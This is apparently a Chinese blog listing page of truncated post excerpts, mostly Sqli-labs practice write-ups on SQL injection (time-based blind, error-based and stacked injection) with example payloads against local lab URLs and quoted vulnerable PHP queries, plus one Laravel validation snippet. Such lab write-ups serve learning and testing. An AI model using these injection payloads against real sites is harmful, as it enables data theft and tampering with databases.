Apr122020
laravel参数验证规则扩展示例
laravel参数验证规则扩展示例,如下:
<?php
namespace App\Library;
use App\Models\ProvinceCityCounty;
use Input;
use Validator;
class ValidatorRules {
public static function extend() {
self::identitycards();
self::cloudFileId();
self::id();
self::strwidth();
self::equal();
self::mod();
self::mob...阅读全文
抢沙发
Apr092020
Sqli-labs Less-49 order by后的注入
本关与47关基本类似,区别在于没有错误回显,所以我们可以通过延时注入和导入文件进行注入。
利用延时注入
http://127.0.0.1/sql/Less-49/?sort=1′ and (if(ascii(substr((select username from users where id=1),1,1))=115,0,sleep(5)))–+
延时效果图就不贴图展示了,可以构造substr的第一个参数进行后续注入。
或者利用into outfile进行注入http://127.0.0.1/sql/Less-4...阅读全文
Apr092020
Sqli-labs Less-47 order by后的注入
本关的sql语句为
$sql = "SELECT * FROM users ORDER BY '$id'";
将id变为字符型,因此根据我们上述提到的知识,我们依旧按照注入的位置进行分类。
1、order by后的参数
我们只能使用and来进行报错和延时注入。我们下面给出几个payload示例。
① and rand相结合的方式,payload:
http://127.0.0.1/sql/Less-47/?sort=1′ and rand(ascii(left(database(),1))=115)–+
换成116...阅读全文
Apr092020
Sqli-labs Less-43 堆叠注入
本关与42关的原理基本一致,我们还是定位在login.php中的password。关键代码:
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
登录:username:admin
Password:c’);insert into users(id,username,password) values(R...阅读全文
Apr092020
Sqli-labs Less-42 堆叠注入
pass_change.php关键代码
$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
pdate更新数据后,经过mysq...阅读全文
Apr092020
Apr092020
Apr092020
Sqli-labs Less-39 堆叠注入
和less-38的区别在于sql语句的不一样:SELECT * FROM users WHERE id=$id LIMIT 0,1
也就是数字型注入,我们可以构造以下的payload:
http://127.0.0.1/sql/Less-39/index.php?id=1;insert into users(id,username,password) values (’39’,’less39′,’hello’)–+
通过数据表中可以看到添加的less-39项。
阅读全文
Apr092020
Sqli-labs Less-38 堆叠注入
学习了关于stacked injection的相关知识,我们在本关可以得到直接的运用。
在执行select时的sql语句为:SELECT * FROM users WHERE id=’$id’ LIMIT 0,1
可以直接构造如下的payload:
http://127.0.0.1/sql/Less-38/index.php?id=1′;insert into users(id,username,password) values (’38’,’less38′,’hello’)–+
再看数据表中...阅读全文
Apr092020
Sqli-labs Background-8 堆叠注入
Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。
0x01 原理介绍
在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语...阅读全文